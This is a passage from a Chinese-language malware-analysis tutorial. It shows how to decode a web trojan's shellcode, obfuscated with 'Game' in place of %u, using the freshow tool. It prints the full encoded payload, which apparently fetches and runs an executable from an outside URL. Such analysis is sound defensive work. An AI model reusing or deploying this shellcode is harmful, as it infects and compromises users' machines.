接下来我们还是以详细的实例,来讲解以shellcode加密的网马,如何使用freshow工具来解密
Game54EBGame758BGame8B3CGame3574Game0378Game56F5Game768BGame0320Game33F5Game49C9GameAD41GameDB33Game0F36Game14BEGame3828Game74F2GameC108Game0DCBGameDA03GameEB40Game3BEFGame75DFGame5EE7Game5E8BGame0324Game66DDGame0C8BGame8B4BGame1C5EGameDD03Game048BGame038BGameC3C5Game7275Game6D6CGame6E6FGame642EGame6C6CGame4300Game5C3AGame2e55Game7865Game0065GameC033Game0364Game3040Game0C78Game408BGame8B0CGame1C70Game8BADGame0840Game09EBGame408BGame8D34Game7C40Game408BGame953CGame8EBFGame0E4EGameE8ECGameFF84GameFFFFGameEC83Game8304Game242CGameFF3CGame95D0GameBF50Game1A36Game702FGame6FE8GameFFFFGame8BFFGame2454Game8DFCGameBA52GameDB33Game5353GameEB52Game5324GameD0FFGameBF5DGameFE98Game0E8AGame53E8GameFFFFGame83FFGame04ECGame2C83Game6224GameD0FFGame7EBFGameE2D8GameE873GameFF40GameFFFFGameFF52GameE8D0GameFFD7GameFFFFGame7468Game7074Game2f3aGame682fGame6f61Game6978Game3161Game2e38Game6f63Game2f6dGame6978Game2f61Game3566Game632eGame7373Game0000
上述代码实际上是一个典型的shellcode,我们先来简单分析一下,根据shellcode特征:以相同分隔符(一般为%u)分隔的4位一组的十六进制字符串。我们看到上述代码有很多的Game这个单词,每个Game之间的字符都是4位,刚好符合shellcode的特征,那么我们先尝试将Game替换为%u后再进行解密。